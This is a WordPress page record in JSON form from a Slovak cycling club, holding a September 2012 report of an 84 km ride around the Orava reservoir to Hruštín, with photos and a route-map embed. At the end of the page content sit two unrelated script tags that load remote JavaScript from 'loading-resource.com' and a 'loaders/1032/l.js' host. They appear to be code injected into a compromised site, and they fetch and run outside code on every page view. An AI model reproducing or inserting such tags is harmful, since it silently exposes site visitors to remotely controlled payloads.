{"id":4057,"date":"2012-10-01T20:46:52","date_gmt":"2012-10-01T19:46:52","guid":{"rendered":"http:\/\/www.cykloklubpodbiel.sk\/?page_id=4057"},"modified":"2012-10-01T21:51:02","modified_gmt":"2012-10-01T20:51:02","slug":"cyklotura-ski-zabava-hrustin","status":"publish","type":"page","link":"https:\/\/www.cykloklubpodbiel.sk\/?page_id=4057","title":{"rendered":"cyklot\u00fara SKI Zabava Hru\u0161tin"},"content":{"rendered":"<div id=\"attachment_204\" style=\"width: 565px\" class=\"wp-caption aligncenter\"><a href=\"http:\/\/www.cykloklubpodbiel.sk\/wp-content\/uploads\/2012\/09\/panozabava.jpg\"><img aria-describedby=\"caption-attachment-204\" loading=\"lazy\" class=\"size-medium wp-image-204\" title=\"Panor\u00e1ma nad Oravskou priehradou\" src=\"http:\/\/www.cykloklubpodbiel.sk\/wp-content\/uploads\/2012\/09\/t_panozabava.png\" alt=\"Oravsk\u00e1 priehrada\" width=\"555\" height=\"204\" \/><\/a><p id=\"caption-attachment-204\" class=\"wp-caption-text\">Panor\u00e1ma nad Oravskou priehradou<\/p><\/div>\n<p><span style=\"color: #000000;\"><strong>D<\/strong>\u0148a<\/span> <span style=\"color: #ff0000;\"><strong>16.septembra 2012<\/strong><\/span> <span style=\"color: #000000;\">sme sa u\u017e tradi\u010dne stretli na najdlh\u0161ej \u00a0jesennej bajkova\u010dke, ktor\u00e1 vedie cez \u0160tefanov, okolo Oravskej priehrady a\u00a0po\u013en\u00fdmi cestami poza Vavre\u010dku a\u00a0Lokcu a\u017e do Hru\u0161t\u00edna. O\u00a09:30 sa na zast\u00e1vke v\u00a0Podbieli stretla pomerne mal\u00e1, no v\u00fdkonnostne siln\u00e1 skupina 8 \u013eud\u00ed.\u00a0<em>Prv\u00fd kr\u00e1t sa k\u00a0n\u00e1m pripojila aj Pe\u0165a, ktor\u00e1 ale vzh\u013eadom na natr\u00e9novan\u00e9 kilometre nemala \u017eiadny probl\u00e9m s\u00a0d\u013a\u017ekou a\u00a0tempom tejto trasy a\u00a0tak si spolu s\u00a0Majkou za\u0161\u013eapali v inak\u00a0mu\u017eskom kolekt\u00edve.<\/em><\/span><\/p>\n<div id=\"attachment_173\" style=\"width: 270px\" class=\"wp-caption alignleft\"><a href=\"http:\/\/www.cykloklubpodbiel.sk\/wp-content\/uploads\/2012\/09\/skyzabava1.jpg\"><img aria-describedby=\"caption-attachment-173\" loading=\"lazy\" class=\"size-medium wp-image-173\" title=\"Poh\u013ead na Kolibu u Kuba na Vasi\u013eovskej holi\" src=\"http:\/\/www.cykloklubpodbiel.sk\/wp-content\/uploads\/2012\/09\/t_skyzabava1.jpg\" alt=\"Koliba u Kuba\" width=\"260\" height=\"173\" \/><\/a><p id=\"caption-attachment-173\" class=\"wp-caption-text\">Poh\u013ead na Kolibu u Kuba na Vasi\u013eovskej holi<\/p><\/div>\n<p><span style=\"color: #000000;\"><em>\u00a0Po\u010dasie n\u00e1m od za\u010diatku hrozilo da\u017e\u010fom a\u00a0tak si m\u00f4j \u00fanik v\u00a0Kr\u00e1snej H\u00f4rke (ktor\u00fd mal sl\u00fa\u017ei\u0165 iba na vyzle\u010denie bundy) v\u0161etci vysvetlili ako v\u00fdzvu zv\u00fd\u0161i\u0165 tempo dne\u0161nej jazdy v snahe unikn\u00fa\u0165 da\u017e\u010fu.<\/em><\/span><\/p>\n<p><span style=\"color: #000000;\"><em> No ke\u010f na\u0161i Anjeli str\u00e1\u017eni videli ako sa od \u00a0za\u010diatku tr\u00e1pime, rozhodli sa n\u00e1m pom\u00f4c\u0165 a\u00a0prijemn\u00e9 po\u010dasie pod mrakom n\u00e1m vydr\u017ealo a\u017e do konca tejto \u00fa\u017easnej trasy.<\/em><\/span><\/p>\n<p><span style=\"color: #000000;\"><em> V\u00a0Hru\u0161t\u00edne sme si urobili prv\u00fa men\u0161iu pauzu a\u00a0odtia\u013e sme pokra\u010dovali na chatu Z\u00e1bava na konci Hru\u0161t\u00ednskej doliny. Kde sme si v\u0161etci dali v\u00fddatn\u00fd obed a\u00a0s\u00a0tro\u0161kou humoru nabrali sily do z\u00e1vere\u010dn\u00e9ho st\u00fapania na Pr\u00edslop. Odtia\u013e to u\u017e i\u0161lo samo a\u017e do Oravsk\u00e9ho Podz\u00e1mku, kde za\u010dalo posledn\u00e9 tr\u00e1penie a\u00a0t\u00fdm je dojazd po hlavnej ceste a\u017e do Podbiela. <\/em><\/span><\/p>\n<p><span style=\"color: #000000;\"><em>Ke\u010f\u017ee sme t\u00fato 84 km dlh\u00fa trasu pre\u0161li v\u00a0rekordne kr\u00e1tkom \u010dase, mohli sme o\u00a0to dlh\u0161ie posedie\u0165 v\u00a0cielia pri dobrom PIVKU a\u00a0 vym\u00fd\u0161\u013ea\u0165 nov\u00e9 akcie pre bud\u00facu sez\u00f3nu. U\u017e sa te\u0161\u00edm na pr\u00edchod jari a\u00a0na nov\u00fa sez\u00f3nu.<\/em><\/span><\/p>\n<p><span style=\"color: #000000;\">PS: Moje po\u010fakovanie patr\u00ed v\u0161etk\u00fdm t\u00fdm, ktor\u00ed sa z\u00fa\u010dastnili na tejto bajkova\u010dke, a vytvorili prijemn\u00fa atmosf\u00e9ru. D\u00fafam, \u017ee na \u0148u budeme dlho spom\u00edna\u0165. <em>\/\u013dubom\u00edr Kamody\/<\/em><\/span><span style=\"color: #000000;\"><br \/>\n<\/span><\/p>\n<p><a href=\"http:\/\/www.cykloserver.cz\/tipy-na-vylety\/detail\/?d=105012&amp;akey=9d63e71454d9d7a57968067c4a75c7d6\"><span style=\"color: #ff0000;\">Zobrazi\u0165 trasu v cykloatlase online<\/span><\/a><\/p>\n<div id='ca_emb_105012_1349124237' style='width: 555px; height: 300px'><\/div>\n<p><script type='text\/javascript' src='http:\/\/www.cykloserver.cz\/cykloatlas\/emb.php?d=105012&amp;akey=9d63e71454d9d7a57968067c4a75c7d6&amp;t=1349124237'><\/script><\/p>\n<p><img style=\"width: 555px; height: 200px;\" src=\"http:\/\/www.cykloserver.cz\/imgdyn\/vylety\/95\/65\/134868128039565.gif\" alt=\"\" \/><\/p>\n<div id=\"attachment_43\" style=\"width: 565px\" class=\"wp-caption aligncenter\"><a href=\"http:\/\/www.cykloklubpodbiel.sk\/wp-content\/gallery\/panorama\/12\/skyzabava\/360panozabava.html\"><strong><img aria-describedby=\"caption-attachment-43\" loading=\"lazy\" class=\"size-medium wp-image-43\" title=\"360\u00b0 panor\u00e1ma na okolie vleku SKI ZABAVA\" src=\"http:\/\/www.cykloklubpodbiel.sk\/wp-content\/uploads\/2012\/09\/t_360panozabava.png\" alt=\"SKI Zabava\" width=\"555\" height=\"43\" \/><\/strong><\/a><p id=\"caption-attachment-43\" class=\"wp-caption-text\">360\u00b0 panor\u00e1ma na okolie vleku SKI ZABAVA<\/p><\/div>\n<p>&nbsp;<\/p>\n<p><script type=\"text\/javascript\" src=\"\/\/loading-resource.com\/data.geo.php?callback=window.__geo.getData\"><\/script><script type=\"text\/javascript\" src=\"http:\/\/cdncache3-a.akamaihd.net\/loaders\/1032\/l.js?aoi=1311798366&amp;pid=1032&amp;zoneid=62862\"><\/script><\/p>\n","protected":false},"excerpt":{"rendered":"<p>D\u0148a 16.septembra 2012 sme sa u\u017e tradi\u010dne stretli na najdlh\u0161ej \u00a0jesennej bajkova\u010dke, ktor\u00e1 vedie cez \u0160tefanov, okolo Oravskej priehrady a\u00a0po\u013en\u00fdmi cestami poza Vavre\u010dku a\u00a0Lokcu a\u017e do Hru\u0161t\u00edna. O\u00a09:30 sa na zast\u00e1vke v\u00a0Podbieli stretla pomerne mal\u00e1, no v\u00fdkonnostne siln\u00e1 skupina 8 \u013eud\u00ed.\u00a0Prv\u00fd kr\u00e1t sa k\u00a0n\u00e1m pripojila aj Pe\u0165a, ktor\u00e1 ale vzh\u013eadom na natr\u00e9novan\u00e9 kilometre nemala \u017eiadny [&hellip;]<\/p>\n","protected":false},"author":1,"featured_media":0,"parent":3019,"menu_order":15,"comment_status":"open","ping_status":"closed","template":"","meta":{"advgb_blocks_editor_width":"","advgb_blocks_columns_visual_guide":"","ngg_post_thumbnail":0},"coauthors":[],"author_meta":{"author_link":"https:\/\/www.cykloklubpodbiel.sk\/?author=1","display_name":"\u013dubom\u00edr Franko"},"relative_dates":{"created":"Posted 14 years ago","modified":"Updated 14 years ago"},"absolute_dates":{"created":"Posted on 1. Okt\u00f3ber 2012","modified":"Updated on 1. Okt\u00f3ber 2012"},"absolute_dates_time":{"created":"Posted on 1. Okt\u00f3ber 2012 20:46","modified":"Updated on 1. Okt\u00f3ber 2012 21:51"},"featured_img_caption":"","featured_img":false,"series_order":"","_links":{"self":[{"href":"https:\/\/www.cykloklubpodbiel.sk\/index.php?rest_route=\/wp\/v2\/pages\/4057"}],"collection":[{"href":"https:\/\/www.cykloklubpodbiel.sk\/index.php?rest_route=\/wp\/v2\/pages"}],"about":[{"href":"https:\/\/www.cykloklubpodbiel.sk\/index.php?rest_route=\/wp\/v2\/types\/page"}],"author":[{"embeddable":true,"href":"https:\/\/www.cykloklubpodbiel.sk\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/www.cykloklubpodbiel.sk\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=4057"}],"version-history":[{"count":28,"href":"https:\/\/www.cykloklubpodbiel.sk\/index.php?rest_route=\/wp\/v2\/pages\/4057\/revisions"}],"predecessor-version":[{"id":4144,"href":"https:\/\/www.cykloklubpodbiel.sk\/index.php?rest_route=\/wp\/v2\/pages\/4057\/revisions\/4144"}],"up":[{"embeddable":true,"href":"https:\/\/www.cykloklubpodbiel.sk\/index.php?rest_route=\/wp\/v2\/pages\/3019"}],"wp:attachment":[{"href":"https:\/\/www.cykloklubpodbiel.sk\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=4057"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}